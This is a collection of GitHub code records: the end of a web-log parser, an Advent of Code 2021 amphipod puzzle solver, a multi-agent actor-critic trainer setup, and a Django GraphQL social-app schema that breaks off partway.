Feature 2: top 10 resources on the site that consume the most bandwidth\r\nf3='./log_output/hours.txt' # Feature 3: the site’s 10 busiest 60-minute period3\r\nf4='./log_output/blocked.txt' # Feature 4: hosts of three consecutive failed login attempts over 20 seconds\r\nlog_parser(filename,f1,f2,f3,f4)\r\n\r\ninput(\"Hit any key to End.\") #=== stopper for Python on Windows ===#\r\n# Main Routine: End\r\n","repo_name":"Masa4649/Insight-Data-Challenge-2017-Apr","sub_path":"src/process_log_MN.py","file_name":"process_log_MN.py","file_ext":"py","file_size_in_byte":8409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"46881253234","text":"from collections import *\nfrom typing import *\nfrom heapq import *\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom puzzle import PuzzleContext\n\n\nclass Amphipod(Enum):\n A = (2, 1)\n B = (4, 10)\n C = (6, 100)\n D = (8, 1000)\n\n @property\n def target_pos(self) -> int:\n return self.value[0]\n\n @property\n def movement_cost(self) -> int:\n return self.value[1]\n\n def __lt__(self, other) -> bool:\n return self.value < other.value\n\n\n@dataclass(order=True)\nclass Room:\n pos: int\n max_size: int\n amphipods: List[Amphipod]\n\n def copy(self) -> \"Room\":\n return Room(self.pos, self.max_size, self.amphipods.copy())\n\n def pop(self) -> Optional[Amphipod]:\n try:\n return self.amphipods.pop()\n except IndexError:\n return None\n\n def has_space(self) -> bool:\n return len(self.amphipods) < self.max_size\n\n def is_empty(self) -> bool:\n return len(self.amphipods) == 0\n\n def all_same(self) -> bool:\n return len(self.amphipods) == 0 or all(\n a == self.amphipods[0] for a in self.amphipods\n )\n\n def all_ok(self) -> bool:\n return all(a.target_pos == self.pos for a in self.amphipods)\n\n def __hash__(self) -> int:\n return hash((self.pos, tuple(self.amphipods)))\n\n@dataclass\nclass Hallway:\n pos: int\n amphipod: Optional[Amphipod]\n\n def copy(self) -> \"Hallway\":\n return Hallway(self.pos, self.amphipod)\n\n def __hash__(self) -> int:\n return hash((self.pos, self.amphipod))\n\n def __lt__(self, other) -> bool:\n a = self.amphipod.value if self.amphipod else (0, 0)\n b = other.amphipod.value if other.amphipod else (0, 0)\n return (self.pos, a) < (other.pos, b)\n\n\n@dataclass(order=True)\nclass State:\n cells: List[Union[Hallway, Room]]\n\n def is_terminal(self) -> bool:\n for c in self.cells:\n if isinstance(c, Hallway) and c.amphipod is not None:\n return False\n if isinstance(c, Room) and not c.all_ok():\n return False\n return True\n\n def draw(self) -> str:\n width = len(self.cells)+2\n height = max(c.max_size for c in self.cells if isinstance(c, Room)) + 3\n grid = [[\" \" for _ in range(width)] for _ in range(height)]\n\n for j in range(0, width):\n grid[0][j] = \"#\"\n grid[1][0] = \"#\"\n for c in self.cells:\n if isinstance(c, Hallway):\n grid[1][1+c.pos] = \".\" if c.amphipod is None else c.amphipod.name\n elif isinstance(c, Room):\n grid[1][1+c.pos] = \".\"\n for i, cc in enumerate(c.amphipods):\n grid[height-2-i][1+c.pos] = cc.name\n for i in range(len(c.amphipods), c.max_size):\n grid[height-2-i][1+c.pos] = \".\"\n for j in range(0, width):\n if grid[2][j] == \" \":\n grid[2][j] = \"#\"\n for j in range(2, width-2):\n if grid[3][j] == \" \":\n grid[3][j] = \"#\"\n grid[1][-1] = \"#\"\n for j in range(2, width-2):\n grid[-1][j] = \"#\"\n\n return \"\\n\".join([\"\".join(r) for r in grid])\n\n\n def get_next(self) -> Iterable[Tuple[\"State\", int]]:\n for i, c in enumerate(self.cells):\n if isinstance(c, Hallway):\n if c.amphipod is None:\n continue\n # move to some room\n for j in reversed(range(0, i)):\n cc = self.cells[j]\n if isinstance(cc, Hallway) and cc.amphipod is not None:\n break\n if isinstance(cc, Room) and cc.has_space() and cc.all_ok() and c.amphipod.target_pos == cc.pos:\n new_cells = [c.copy() for c in self.cells]\n new_cells[i].amphipod = None\n new_cells[j].amphipods.append(c.amphipod)\n yield State(new_cells), (abs(j-i)+(cc.max_size-len(cc.amphipods)))*c.amphipod.movement_cost\n for j in range(i+1, len(self.cells)):\n cc = self.cells[j]\n if isinstance(cc, Hallway) and cc.amphipod is not None:\n break\n if isinstance(cc, Room) and cc.has_space() and cc.all_ok() and c.amphipod.target_pos == cc.pos:\n new_cells = [c.copy() for c in self.cells]\n new_cells[i].amphipod = None\n new_cells[j].amphipods.append(c.amphipod)\n yield State(new_cells), (abs(j-i)+(cc.max_size-len(cc.amphipods)))*c.amphipod.movement_cost\n \n elif isinstance(c, Room):\n if c.is_empty():\n continue\n # move to some hallway\n for j in reversed(range(0, i)):\n cc = self.cells[j]\n if isinstance(cc, Hallway):\n if cc.amphipod is not None:\n break\n new_cells = [c.copy() for c in self.cells]\n a = new_cells[i].pop()\n new_cells[j].amphipod = a\n yield State(new_cells), (abs(j-i)+(c.max_size-len(c.amphipods)+1))*a.movement_cost\n \n for j in range(i+1, len(self.cells)):\n cc = self.cells[j]\n if isinstance(cc, Hallway):\n if cc.amphipod is not None:\n break\n new_cells = [c.copy() for c in self.cells]\n a = new_cells[i].pop()\n new_cells[j].amphipod = a\n yield State(new_cells), (abs(j-i)+(c.max_size-len(c.amphipods)+1))*a.movement_cost\n \n\n def __hash__(self) -> int:\n return hash(tuple(self.cells))\n\n @classmethod\n def parse(cls, s: str) -> \"State\":\n lines = s.split(\"\\n\")\n height = len(lines)\n width = len(lines[0])\n assert lines[0] == \"#\"*width\n assert lines[1] == \"#\"+\".\"*(width-2)+\"#\"\n\n room_size = height-3\n cells = [\n Hallway(0, None),\n Hallway(1, None),\n Room(2, room_size, []),\n Hallway(3, None),\n Room(4, room_size, []),\n Hallway(5, None),\n Room(6, room_size, []),\n Hallway(7, None),\n Room(8, room_size, []),\n Hallway(9, None),\n Hallway(10, None),\n ]\n for j in [3, 5, 7, 9]:\n for i in reversed(range(2, height-1)):\n cells[j-1].amphipods.append(Amphipod[lines[i][j]])\n\n return State(cells)\n\n\ndef dijkstra(start: State) -> int:\n pq = []\n costs = defaultdict(lambda: 10**100)\n\n heappush(pq, (0, start))\n costs[start] = 0\n while pq:\n d, u = heappop(pq)\n if d > costs[u]:\n continue\n if u.is_terminal():\n return costs[u]\n for v, c in u.get_next():\n if costs[u] + c < costs[v]:\n costs[v] = costs[u] + c\n heappush(pq, (costs[v], v))\n\n\nwith PuzzleContext(year=2021, day=23) as ctx:\n start = State.parse(ctx.data)\n ans1 = dijkstra(start)\n ctx.submit(1, ans1)\n\n lines = ctx.nonempty_lines\n lines = lines[:3] + [\" #D#C#B#A# \", \" #D#B#A#C# \"] + lines[3:]\n start = State.parse(\"\\n\".join(lines))\n ans2 = dijkstra(start)\n ctx.submit(2, ans2)\n","repo_name":"vstrimaitis/aoc-2021","sub_path":"python/23/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5227687128","text":"def build_iac_trainer(\n config,\n env: MultiAgentEnv,\n models: Dict[str, nn.Module],\n):\n policy_config = config[\"policy\"]\n executing_config = config[\"executing\"]\n\n critic_lr = policy_config[\"critic_lr\"]\n actor_lr = policy_config[\"actor_lr\"]\n discount_factor = policy_config[\"discount_factor\"]\n update_period = policy_config[\"update_period\"]\n advg_type = policy_config[\"advg_type\"]\n\n logger.info(\"create IAC trainer\")\n logger.info(\"\\t critic lr : %f\", critic_lr)\n logger.info(\"\\t discount factor : %f\", discount_factor)\n logger.info(\"\\t update period : %d\", update_period)\n\n agents_id = env.agents_id\n loss_fn = nn.MSELoss()\n policies = {}\n for id in agents_id:\n model = models[id]\n critic_net = model[\"critic_net\"]\n critic_target_net = model[\"critic_target_net\"]\n actor_net = model[\"actor_net\"]\n action_space = policy_config[\"action_space\"][id]\n state_space = policy_config[\"state_space\"][id]\n policies[id] = ActorCritic(\n critic_net=critic_net,\n critic_target_net=critic_target_net,\n actor_net=actor_net,\n critic_lr=critic_lr,\n actor_lr=actor_lr,\n discount_factor=discount_factor,\n update_period=update_period,\n action_space=action_space,\n state_space=state_space,\n critic_loss_fn=loss_fn,\n advantage_type=advg_type,\n )\n\n recorder = Printer()\n if executing_config[\"recording\"]:\n recorder = TorchRecorder(executing_config[\"record_base_dir\"])\n logger.info(\"\\t training will be recorded\")\n trainer = IOnPolicyTrainer(\n type=PolicyTypes.IAC,\n policies=policies,\n env=env,\n recorder=recorder,\n config=executing_config,\n )\n return trainer\n\n\ndef get_ac_test_setting():\n critic_lr = 1e-3\n actor_lr = 1e-3\n batch_size = 16\n discount_factor = 0.99\n update_period = 100\n action_space = 2\n state_space = 4\n advg_type = AdvantageTypes.RewardToGO\n policy_config = {\n \"critic_lr\": critic_lr,\n \"actor_lr\": actor_lr,\n \"discount_factor\": discount_factor,\n \"update_period\": update_period,\n \"advg_type\": advg_type,\n \"action_space\": {},\n \"state_space\": {},\n }\n buffer_config = {}\n exec_config = {\n \"batch_size\": batch_size,\n \"recording\": True,\n \"ckpt_frequency\": 0,\n \"record_base_dir\": \"records/gym_test\",\n }\n trainner_config = {\n \"type\": PolicyTypes.IAC,\n \"executing\": exec_config,\n \"policy\": policy_config,\n \"buffer\": buffer_config,\n }\n actor_net = CartPolePG(\n input_space=state_space,\n output_space=action_space,\n )\n\n critic_net = CartPole(\n input_space=state_space,\n output_space=action_space,\n )\n\n critic_target_net = CartPole(\n input_space=state_space,\n output_space=action_space,\n )\n\n model = {\n \"actor_net\": actor_net,\n \"critic_net\": critic_net,\n \"critic_target_net\": critic_target_net,\n }\n\n return trainner_config, model\n\n\nclass CartPolePG(nn.Module):\n def __init__(self, input_space, output_space) -> None:\n super(CartPolePG, self).__init__()\n self.fc1 = nn.Linear(input_space, 16)\n self.fc2 = nn.Linear(16, 8)\n self.fc3 = nn.Linear(8, output_space)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n action = F.softmax(self.fc3(x), dim=-1)\n return action\n\n\nclass CartPole(nn.Module):\n def __init__(self, input_space, output_space) -> None:\n super(CartPole, self).__init__()\n self.fc1 = nn.Linear(input_space, 24)\n self.fc2 = nn.Linear(24, 24)\n self.fc3 = nn.Linear(24, output_space)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n action = self.fc3(x)\n return action\n","repo_name":"AmoyZhp/traffic_light_control","sub_path":"traffic_light_control/hprl/trainer/builder/iac.py","file_name":"iac.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15040371520","text":"import graphene\nfrom graphene_django import DjangoObjectType\nfrom graphene_file_upload.scalars import Upload\nfrom api.models import *\nfrom api.token import *\nfrom graphene import relay, Node\nfrom graphql import GraphQLError\n\n\nclass UserType(DjangoObjectType):\n class Meta:\n model = UserModel\n\n\nclass PostType(DjangoObjectType):\n class Meta:\n model = PostModel\n\n\nclass PictureType(DjangoObjectType):\n class Meta:\n model = PictureModel\n\n\nclass FollowType(DjangoObjectType):\n class Meta:\n model = FollowModel\n\n\nclass LikeType(DjangoObjectType):\n class Meta:\n model = LikeModel\n\n\nclass CommentType(DjangoObjectType):\n class Meta:\n model = CommentModel\n\n\nclass HistoryType(DjangoObjectType):\n class Meta:\n model = HistoryModel\n\n\nclass ChatroomType(DjangoObjectType):\n class Meta:\n model = ChatroomModel\n\n\nclass MessageType(DjangoObjectType):\n class Meta:\n model = MessageModel\n\n\nclass Query(graphene.ObjectType):\n users = graphene.List(UserType,\n kakaoID=graphene.Int(),\n username=graphene.String(),\n accessToken=graphene.String(),\n search=graphene.Int(),\n )\n\n posts = graphene.List(PostType,\n username=graphene.String(),\n accessToken=graphene.String(required=True),\n record=graphene.Int(),\n )\n\n pics = graphene.List(PictureType,\n record=graphene.Int(),\n username=graphene.String(),\n accessToken=graphene.String(required=True),\n )\n\n follows = graphene.List(FollowType,\n accessToken=graphene.String(required=True),\n username=graphene.String(),\n choice=graphene.Int(),\n )\n\n likes = graphene.List(LikeType,\n accessToken=graphene.String(required=True),\n typeinfo=graphene.String(required=True),\n record=graphene.Int(required=True),\n username=graphene.String(),\n )\n\n comments = graphene.List(CommentType,\n accessToken=graphene.String(required=True),\n record=graphene.Int(required=True),\n parent=graphene.Int(),\n )\n\n histories = graphene.List(HistoryType,\n accessToken=graphene.String(required=True),\n )\n\n chatrooms = graphene.List(ChatroomType,\n accessToken=graphene.String(required=True),\n username=graphene.String(),\n )\n\n messages = graphene.List(MessageType,\n accessToken=graphene.String(required=True),\n username=graphene.String(required=True),\n )\n\n def resolve_users(self, info, kakaoID=None, username=None, accessToken=None, search=None):\n query = UserModel.objects.all()\n\n if kakaoID:\n return UserModel.objects.filter(kakaoID=kakaoID)\n\n if search == 1:\n return UserModel.objects.filter(name__icontains=username)\n\n elif username:\n return UserModel.objects.filter(name=username)\n\n elif accessToken:\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is not None:\n return UserModel.objects.filter(kakaoID=kakaoID)\n else:\n return query\n\n def resolve_posts(self, info, username=None, accessToken=None, record=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not Permitted\")\n\n if record:\n posts = PostModel.objects.filter(user__kakaoID=kakaoID, post_id=record)\n return posts\n\n if username:\n posts = PostModel.objects.filter(user__name=username).order_by('date').reverse()\n return posts\n\n else:\n posts = PostModel.objects.filter(user__name=UserModel.objects.get(kakaoID=kakaoID))\n for following in list(FollowModel.objects.filter(user_from__kakaoID=kakaoID).values(\"user_to_id\")):\n posts |= PostModel.objects.filter(user__name=UserModel.objects.get(user_id=following[\"user_to_id\"]))\n return posts.order_by('date').reverse()\n\n def resolve_pics(self, info, username=None, record=None, accessToken=None):\n if record:\n return PictureModel.objects.filter(record_id=record)\n\n elif username:\n return PictureModel.objects.filter(\n record_id__in=PostModel.objects.filter(user__name=username).values('post_id')).order_by(\n 'pic_id').reverse()\n\n else:\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is None:\n raise GraphQLError(\"Not Permitted\")\n\n return PictureModel.objects.filter(\n record_id__in=PostModel.objects.filter(user__kakaoID=kakaoID).values('post_id')).order_by(\n 'pic_id').reverse()\n\n def resolve_follows(self, info, accessToken, username=None, choice=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not Permitted\")\n\n if username is not None:\n follow = FollowModel.objects.filter(user_from__kakaoID=kakaoID, user_to__name=username)\n return follow\n\n else:\n if choice == 1:\n return FollowModel.objects.filter(user_to__kakaoID=kakaoID)\n elif choice == 2:\n return FollowModel.objects.filter(user_from__kakaoID=kakaoID)\n else:\n raise GraphQLError(\"Error\")\n\n def resolve_likes(self, info, accessToken, typeinfo, record, username=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n likes = LikeModel.objects.filter(type=typeinfo, record_id=record, user_from__kakaoID=kakaoID)\n return likes\n\n def resolve_comments(self, info, accessToken, record, parent=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n if parent is not None:\n comments = CommentModel.objects.filter(post_id=record, parent=parent)\n else:\n comments = CommentModel.objects.filter(post_id=record)\n return comments\n\n def resolve_histories(self, info, accessToken):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n histories = HistoryModel.objects.filter(user__kakaoID=kakaoID).order_by(\"date\").reverse()\n return histories\n\n def resolve_chatrooms(self, info, accessToken, username=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n if username:\n chatrooms = ChatroomModel.objects.filter(user_from__kakaoID=kakaoID, user_to__name=username)\n chatrooms |= ChatroomModel.objects.filter(user_to__kakaoID=kakaoID, user_from__name=username)\n return chatrooms\n\n chatrooms = ChatroomModel.objects.filter(user_from__kakaoID=kakaoID)\n chatrooms |= ChatroomModel.objects.filter(user_to__kakaoID=kakaoID)\n return chatrooms\n\n def resolve_messages(self, info, accessToken, username):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n raise GraphQLError(\"Not permitted\")\n\n try:\n chatroom = ChatroomModel.objects.get(user_from__kakaoID=kakaoID, user_to__name=username)\n except:\n try:\n chatroom = ChatroomModel.objects.get(user_to__kakaoID=kakaoID, user_from__name=username)\n except:\n raise GraphQLError(\"Not permitted\")\n\n messages = MessageModel.objects.filter(chatroom_id=chatroom.chatroom_id)\n return messages\n\n\nclass CreateUser(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n name = graphene.String(required=True)\n kakaoID = graphene.Int(required=True)\n accessToken = graphene.String(required=True)\n\n def mutate(self, info, name, kakaoID, accessToken):\n if verify_kakaoToken(accessToken, kakaoID):\n try:\n user = UserModel.objects.get(kakaoID=kakaoID)\n except:\n user = UserModel(name=name, kakaoID=kakaoID)\n user.save()\n return CreateUser(success=True)\n return CreateUser(success=False)\n\n\nclass UploadProfile(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n img = Upload(required=True)\n accessToken = graphene.String(required=True)\n\n def mutate(self, info, img, accessToken):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return UploadProfile(success=False)\n\n User = UserModel.objects.get(kakaoID=kakaoID)\n img.name = str(kakaoID) + \"_\" + img.name\n User.profile.delete()\n User.profile = img\n User.save()\n return UploadProfile(success=True)\n\n\nclass EditProfile(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n img = Upload()\n name = graphene.String()\n text_comment = graphene.String()\n is_open = graphene.Boolean()\n\n def mutate(self, info, accessToken, img=None, name=None, text_comment=None, is_open=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return EditProfile(success=False)\n\n try:\n User = UserModel.objects.get(kakaoID=kakaoID)\n if img:\n img.name = str(kakaoID) + \"_\" + img.name\n User.profile.delete()\n User.profile = img\n if name:\n User.name = name\n if text_comment:\n User.text_comment = text_comment\n if is_open:\n User.is_open = is_open\n\n User.save()\n return EditProfile(success=True)\n\n except:\n return EditProfile(success=False)\n\n\nclass AddPost(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n img = Upload(required=True)\n place = graphene.String()\n hashtag = graphene.String()\n allow_comment = graphene.Boolean()\n comment = graphene.String()\n\n def mutate(self, info, accessToken, img, place=\"\", allow_comment=True, comment=\"\", hashtag=None):\n if not img:\n return AddPost(success=False)\n\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is None:\n return AddPost(success=False)\n\n user = UserModel.objects.get(kakaoID=kakaoID)\n\n post = PostModel(user=user, allow_comment=allow_comment, place=place, like_count=0, text_comment=comment)\n post.save()\n record_id = post.post_id\n\n pic = PictureModel(pic=img, type='P', record_id=record_id, pic_idx=0)\n pic.save()\n\n user.post_count = user.post_count + 1\n user.save()\n\n if hashtag is not None:\n hash = HashtagModel(tag_name=hashtag, type='P', record_id=record_id)\n hash.save()\n\n return AddPost(success=True)\n\n\nclass EditPost(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n place = graphene.String()\n comment = graphene.String()\n\n def mutate(self, info, accessToken, record, place=None, comment=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return EditPost(success=False)\n\n user = UserModel.objects.get(kakaoID=kakaoID)\n try:\n post = PostModel.objects.get(user=user, post_id=record)\n except:\n return EditPost(success=False)\n\n post.text_comment = comment\n post.place = place\n post.save()\n return EditPost(success=True)\n\n\nclass RemovePost(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return RemovePost(success=False)\n\n user = UserModel.objects.get(kakaoID=kakaoID)\n try:\n post = PostModel.objects.get(user=user, post_id=record)\n except:\n return RemovePost(success=False)\n\n try:\n PictureModel.objects.get(record_id=record, type='P').delete()\n except:\n pass\n\n try:\n comments = CommentModel.objects.filter(post_id=record)\n try:\n likes = LikeModel.objects.filter(record_id__in=comments, type='C').delete()\n except:\n pass\n comments.delete()\n except:\n pass\n\n try:\n LikeModel.objects.filter(record_id=record, type='P').delete()\n except:\n pass\n\n post.delete()\n\n user.post_count -= 1\n user.save()\n return RemovePost(success=True)\n\n\nclass addFollow(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n fkakaoID = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, fkakaoID):\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is None:\n return addFollow(success=False)\n\n if kakaoID == fkakaoID:\n return addFollow(success=False)\n\n try:\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n user_to = UserModel.objects.get(kakaoID=fkakaoID)\n except:\n return addFollow(success=False)\n\n history = FollowModel.objects.filter(user_from__kakaoID=kakaoID, user_to__kakaoID=fkakaoID)\n if history.exists():\n return addFollow(success=False)\n\n else:\n follow = FollowModel(user_from=user_from, user_to=user_to)\n follow.save()\n\n addHistory = HistoryModel(user=user_to, type='F', record_id=follow.follow_id)\n addHistory.save()\n\n user_to.follower_count += 1\n user_to.save()\n\n user_from.following_count += 1\n user_from.save()\n return addFollow(success=True)\n\n\nclass unFollow(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n fkakaoID = graphene.Int(required=True)\n choice = graphene.Int()\n\n def mutate(self, info, accessToken, fkakaoID, choice=None):\n kakaoID = get_kakaoID(accessToken)\n if kakaoID is None:\n return addFollow(success=False)\n\n if kakaoID == fkakaoID:\n return addFollow(success=False)\n\n try:\n if choice == None:\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n user_to = UserModel.objects.get(kakaoID=fkakaoID)\n history = FollowModel.objects.filter(user_from__kakaoID=kakaoID, user_to__kakaoID=fkakaoID)\n if not history.exists():\n return addFollow(success=False)\n else:\n user_from = UserModel.objects.get(kakaoID=fkakaoID)\n user_to = UserModel.objects.get(kakaoID=kakaoID)\n history = FollowModel.objects.filter(user_from__kakaoID=fkakaoID, user_to__kakaoID=kakaoID)\n if not history.exists():\n return addFollow(success=False)\n except:\n return addFollow(success=False)\n\n else:\n history.delete()\n\n user_to.follower_count -= 1\n user_to.save()\n\n user_from.following_count -= 1\n user_from.save()\n return addFollow(success=True)\n\n\nclass addLike(graphene.Mutation):\n success = graphene.Boolean()\n likes = graphene.Int()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n typeinfo = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, typeinfo, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return addLike(success=False)\n\n elif typeinfo != 'P' and typeinfo != 'C':\n return addLike(success=False)\n\n if typeinfo == 'P':\n try:\n post = PostModel.objects.get(post_id=record)\n user_to = post.user\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n\n like = LikeModel(user_from=user_from, user_to=user_to, type=typeinfo, record_id=record)\n like.save()\n\n if user_to.kakaoID != kakaoID:\n addHistory = HistoryModel(user=user_to, type='L', record_id=like.like_id)\n addHistory.save()\n\n post.like_count += 1\n post.save()\n\n return addLike(success=True, likes=post.like_count)\n\n except:\n return addLike(success=False)\n\n else:\n try:\n comment = CommentModel.objects.get(comment_id=record)\n user_to = comment.user\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n\n like = LikeModel(user_from=user_from, user_to=user_to, type=typeinfo, record_id=record)\n like.save()\n\n if user_to.kakaoID != kakaoID:\n addHistory = HistoryModel(user=user_to, type='L', record_id=like.like_id)\n addHistory.save()\n\n comment.like_count += 1\n comment.save()\n\n return addLike(success=True, likes=comment.like_count)\n\n except:\n return addLike(success=False)\n\n\nclass unLike(graphene.Mutation):\n success = graphene.Boolean()\n likes = graphene.Int()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n typeinfo = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, typeinfo, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return unLike(success=False)\n\n elif typeinfo != 'P' and typeinfo != 'C':\n return unLike(success=False)\n\n if typeinfo == 'P':\n try:\n post = PostModel.objects.get(post_id=record)\n user_to = post.user\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n\n like = LikeModel.objects.get(user_from=user_from, user_to=user_to, type=typeinfo, record_id=record)\n like.delete()\n\n post.like_count -= 1\n post.save()\n\n return unLike(success=True, likes=post.like_count)\n except:\n return unLike(success=False)\n\n else:\n try:\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n\n like = LikeModel.objects.get(user_from=user_from, type=typeinfo, record_id=record)\n comment = CommentModel.objects.get(comment_id=like.record_id)\n\n like.delete()\n\n comment.like_count -= 1\n comment.save()\n\n return unLike(success=True, likes=comment.like_count)\n except:\n return unLike(success=False)\n\n\nclass addComment(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n text = graphene.String(required=True)\n parent = graphene.Int()\n\n def mutate(self, info, accessToken, record, text, parent=None):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return addComment(success=False)\n\n try:\n post = PostModel.objects.get(post_id=record)\n if not post.allow_comment:\n return addComment(success=False)\n\n user = UserModel.objects.get(kakaoID=kakaoID)\n notice_to = UserModel.objects.get(user_id=post.user_id)\n\n comment = CommentModel(user=user, post_id=record, text_comment=text)\n\n if parent:\n try:\n parent_comment = CommentModel.objects.get(comment_id=parent)\n if parent_comment.parent:\n return addComment(success=False)\n notice_to = UserModel.objects.get(user_id=parent_comment.user_id)\n\n except:\n return addComment(success=False)\n comment.parent = parent\n\n comment.save()\n\n if user.user_id != notice_to.user_id:\n addHistory = HistoryModel(user=notice_to, type='C', record_id=comment.comment_id)\n addHistory.save()\n\n post.comment_count += 1\n post.save()\n return addComment(success=True)\n\n except:\n return addComment(success=False)\n\n\nclass removeComment(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return removeComment(success=False)\n\n try:\n user = UserModel.objects.get(kakaoID=kakaoID)\n comment = CommentModel.objects.get(user=user, comment_id=record)\n comments = CommentModel.objects.filter(parent=comment.comment_id)\n likes = LikeModel.objects.filter(record_id=record, type='C')\n post = PostModel.objects.get(post_id=comment.post_id)\n total_c = comments.count() + 1\n post.comment_count -= total_c\n post.save()\n if likes.count():\n likes.delete()\n if comments.count():\n comments.delete()\n comment.delete()\n return removeComment(success=True)\n except:\n return removeComment(success=False)\n\n\nclass updateHistorySeen(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return updateHistorySeen(success=False)\n\n try:\n user = UserModel.objects.get(kakaoID=kakaoID)\n history = HistoryModel.objects.get(user=user, history_id=record)\n history.seen = True\n history.save()\n return updateHistorySeen(success=True)\n except:\n return updateHistorySeen(success=False)\n\n\nclass deactivateHistory(graphene.Mutation):\n success = graphene.Boolean()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return deactivateHistory(success=False)\n\n try:\n user = UserModel.objects.get(kakaoID=kakaoID)\n history = HistoryModel.objects.get(user=user, history_id=record)\n history.is_active = False\n history.save()\n return deactivateHistory(success=True)\n except:\n return deactivateHistory(success=False)\n\n\nclass getHistoryDetail(graphene.Mutation):\n username = graphene.String()\n success = graphene.Boolean()\n profile = graphene.String()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n record = graphene.Int(required=True)\n\n def mutate(self, info, accessToken, record):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return deactivateHistory(success=False, username=\"\")\n\n try:\n history = HistoryModel.objects.get(user__kakaoID=kakaoID, history_id=record)\n if history.type == 'L':\n like = LikeModel.objects.get(like_id=history.record_id)\n return getHistoryDetail(success=True, username=like.user_from.name, profile=like.user_from.profile)\n elif history.type == 'F':\n follow = FollowModel.objects.get(follow_id=history.record_id)\n return getHistoryDetail(success=True, username=follow.user_from.name, profile=follow.user_from.profile)\n elif history.type == 'C':\n comment = CommentModel.objects.get(comment_id=history.record_id)\n return getHistoryDetail(success=True, username=comment.user.name, profile=comment.user.profile)\n else:\n return getHistoryDetail(success=False, username=\"\", profile=\"\")\n except:\n return getHistoryDetail(success=False, username=\"\", profile=\"\")\n\n\nclass createChatroom(graphene.Mutation):\n success = graphene.Boolean()\n id = graphene.Int()\n\n class Arguments:\n accessToken = graphene.String(required=True)\n username = graphene.String(required=True)\n\n def mutate(self, info, accessToken, username):\n kakaoID = get_kakaoID(accessToken)\n\n if kakaoID is None:\n return createChatroom(success=False, id=-1)\n\n user_from = UserModel.objects.get(kakaoID=kakaoID)\n try:\n user_to = UserModel.objects.get(name=username)\n except:\n return createChatroom(success=False, id=-1)\n\n if user_from == user_to:\n return createChatroom(success=False, id=-1)\n\n chatrooms = ChatroomModel.objects.filter(user_from=user_from, user_to=user_to)\n chatrooms |= ChatroomModel.objects.filter(user_to=user_from, user_from=user_to)\n\n 